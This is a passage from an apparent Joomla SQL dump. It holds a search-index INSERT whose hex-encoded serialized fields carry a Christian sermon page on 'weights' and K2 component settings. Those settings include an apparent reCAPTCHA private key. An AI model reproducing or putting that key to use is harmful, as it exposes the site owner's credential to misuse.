72c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a323a223135223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a353a224661697468223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a35333a2233313a696d706f7274616e63652d616e642d7369676e69666963616e63652d6f662d776569676874732d6f722d6d65617375726573223b733a373a22636174736c7567223b733a373a22323a6661697468223b733a363a22617574686f72223b733a393a224c6966656f61736973223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a37313a22636f6d706f6e656e742f6b322f6974656d2f33312d696d706f7274616e63652d616e642d7369676e69666963616e63652d6f662d776569676874732d6f722d6d65617375726573223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a393a224c6966656f61736973223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a393a224c6966656f61736973223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a353a224661697468223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a353a224661697468223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3331223b733a353a22726f757465223b733a39303a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d33313a696d706f7274616e63652d616e642d7369676e69666963616e63652d6f662d776569676874732d6f722d6d65617375726573223b733a353a227469746c65223b733a35303a22496d706f7274616e636520616e64205369676e69666963616e6365206f662057656967687473206f72204d65617375726573223b733a31313a226465736372697074696f6e223b733a3432393a222054657874733a204d6963616820363a31312c2050726f762e2031363a31312c204465752e32353a31332d313620496e74726f64756374696f6e205765696768747320636f756c64206265206c69746572616c206f7220696d706c6965642e204c69746572616c20696e207465726d73206f66207468696e6773207573656420746f2067657420746865206163637572617465206d656173757265206f722076616c7565206f662061207468696e672073756368206173207363616c65732c20746170652072756c652c20636f6e7461696e6572732c206b6567732c20626f776c732c206365727469666963617465206166746572206120636f757273652c206578616d20726573756c74732066726f6d206f6e6520636c61737320746f20746865206f74686572206574632e207468697320656e61626c6573206f6e6520746f206b6e6f7720746865206c6576656c2c20746865207472756520776f72746820616e642076616c75652e2041207765696768742069732061206e65757472616c206a756467652e2049742073696d706c65207370656c6c73206f757420776861742069732074686572652120223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30332d31322031363a35343a3538223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30332d31322031363a35343a3538223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(246, 'index.php?option=com_k2&view=item&id=32', 'index.php?option=com_k2&view=item&id=32:the-christian-weights', 'The Christian & Weights', ' Text: 2 Corinthians 13:5-8: 5. Examine yourselves, whether ye be in the faith; prove your own selves. Know ye not your own selves, how that Jesus Christ is in you, except ye be reprobates?. 6 But I trust that ye shall know that we are not reprobates.. 7 Now I pray to God that ye do no evil; not that we should appear approved, but that ye should do that which is honest, though we be as reprobates. 8 For we can do nothing against the truth, but for the truth. ', '2017-06-25 14:18:33', '39cb9d6ba49cfb1fc407681942f07e32', 1, 1, 1, '*', '2017-03-20 17:29:29', '0000-00-00 00:00:00', '2017-03-20 17:29:29', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223332223b733a353a22616c696173223b733a32313a227468652d63687269737469616e2d77656967687473223b733a373a2273756d6d617279223b733a3437323a223c703e546578743a203220436f72696e746869616e732031333a352d383a20c2a0352e204578616d696e6520796f757273656c7665732c207768657468657220796520626520696e207468652066616974683b2070726f766520796f7572206f776e2073656c7665732e204b6e6f77207965206e6f7420796f7572206f776e2073656c7665732c20686f772074686174204a657375732043687269737420697320696e20796f752c2065786365707420796520626520726570726f62617465733f2e20362042757420492074727573742074686174207965207368616c6c206b6e6f77207468617420776520617265206e6f7420726570726f62617465732e2e2037204e6f772049207072617920746f20476f64207468617420796520646f206e6f206576696c3b206e6f7420746861742077652073686f756c642061707065617220617070726f7665642c2062757420746861742079652073686f756c6420646f207468617420776869636820697320686f6e6573742c2074686f75676820776520626520617320726570726f62617465732e203820466f722077652063616e20646f206e6f7468696e6720616761696e7374207468652074727574682c2062757420666f72207468652074727574682e3c2f703e0d0a223b733a343a22626f6479223b733a323133323a220d0a3c703e3c7374726f6e673e494e54524f44554354494f4e3c2f7374726f6e673e3c2f703e0d0a3c703e43687269737469616e2073696d706c79206d65616e7320e2809c434852495354204c494b45e2809d2e205468652062656c69657665727320776572652066697273742063616c6c65642043687269737469616e7320696e20416e74696f63682028416374732031313a323629207768656e207468656972206265686176696f75722c206d696e647365742c2076616c75657320616e64206d616e69666573746174696f6e732077657265207365656e20746f206265206c696b652074686174206f66204a657375732e20416e64207468617420697320686f772077652061726520737570706f73657320746f20626520746f6461792e3c2f703e0d0a3c703e596f75722073616c766174696f6e206973206f6e207468726565206c6576656c7320616e6420796f75206d75737420657870657269656e636520616c6c20666f7220796f75722073616c766174696f6e20746f20626520636f6d706c6574652e3c2f703e0d0a3c703e496e7374616e742053616c766174696f6e3a20746869732068617070656e73206174207468652074696d65206f6620636f6e66657373696f6e2028526f6d2e31303a392d31302c204a6f686e20333a382c2032436f722e20353a3137293c2f703e0d0a3c703e4772616475616c2053616c766174696f6e3a205068696c2e323a31322e20596f75206861766520746f2062652073617665642065766572796461792c2073657061726174696e6720796f757273656c662066726f6d207468696e67732074686174206272696e6720646566696c656d656e742e2047616c2e20353a31362d32312c2045706820323a312d32322e20e2809c457465726e616c207365637572697479e2809d20692e652e206f6e636520796f75206172652073617665642c206e6f206d6174746572207768617420796f7520646f20697320612077726f6e6720646f637472696e652c206974206973206572726f722c20616e642069742077696c6c2074616b652070656f706c6520746f2068656c6c213c2f703e0d0a3c703e556c74696d6174652053616c766174696f6e3a204d6174742e32343a31332c204865622e20333a362c2031342e205768656e20796f75206f766572636f6d652074696c6c2074686520656e64207468656e20796f752067657420736176656420756c74696d6174656c792c20776869636820697320476f64e280997320676f616c20666f7220796f7572206c6966652e2054686520646576696c2077616e747320746f2073746f702070656f706c65206174207374616765206f6e652c20736f20746865792063616e2070726f666573732043687269737469616e69747920616e64207374696c6c20676f20746f2068656c6c2e205761746368206f75742e3c2f703e0d0a3c703e54686520646f637472696e65206f66206a75737420776569676874732068656c707320796f7520746f20776f726b206f757420796f75722073616c766174696f6e2077697468206665617220616e64207472656d626c696e672c2067657474696e6720796f7572206c696665207374726169676874206265666f726520476f6420616e6420796f757220636f6e736369656e636520766f6964206f66206f6666656e63652e3c2f703e0d0a3c703e3c7374726f6e673e57484f20495320412043485249535449414e3f3c2f7374726f6e673e3c2f703e0d0a3c756c3e0d0a3c6c693e4f6e652077686f20686173206163636570746564204a6573757320617320686973204c6f726420616e6420536176696f757220284d6174742e373a32312d3234293c2f6c693e0d0a3c6c693e4f6e652077686f20686173206265636f6d652061206e65772063726561747572652e202832436f722e20353a31372c204a6f686e20333a382d39293c2f6c693e0d0a3c6c693e4f6e652077686f207075747320476f6420666972737420696e20616c6c207468696e67732e20284d6174742e31303a33352c204c6b2e31343a31382d31392c2032362c204c6b2e31383a32302c204c6b2e393a35392d36322e293c2f6c693e0d0a3c6c693e4f6e652077686f206861732063686f73656e20476f64e2809973206b696e67646f6d2061626f76652074686520776f726c6420616e642069747320676c6f72792e2028314a6f686e20323a31352d31362c205068696c2e333a372d31302c20436f6c2e20333a312c2031436f722e363a322c2032436f722e383a352c204c6b2e353a3131292e204f6e652077686f20697320726561647920746f20666f7273616b6520616c6c2e3c2f6c693e0d0a3c6c693e4f6e652077686f20697320726561647920746f20666f7273616b65206f746865727320666f72204a657375732e20284a6f736875612032343a31352c204973612e383a31382c20416374732032313a392c204865622e31313a32342d32362e293c2f6c693e0d0a3c6c693e4f6e652077686f20686173206e6f7420646566696c65642068696d73656c6620776974682077686174206973206f66666572656420746f2069646f6c732e202844616e2e313a38292e20496e206f7572206461792c20746865206b696e67e2809973206d656174206d65616e732c206c61746573742066617368696f6e2c207374796c65732c20706f70756c617220627573696e6573732c2070726163746963652c2072656c6174696f6e73686970732c206f7065726174696f6e73207468617420686176652073696e206d697865642075702077697468207468656d2e3c2f6c693e0d0a3c6c693e4f6e652077686f207472656d626c657320746f206b6565702068697320636f6e736369656e63652070757265206265666f726520476f642e20284a616d657320313a32362d32372e293c2f6c693e0d0a3c2f756c3e223b733a353a226361746964223b733a313a2232223b733a31303a22637265617465645f6279223b733a333a22313936223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30332d32302031393a35323a3538223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3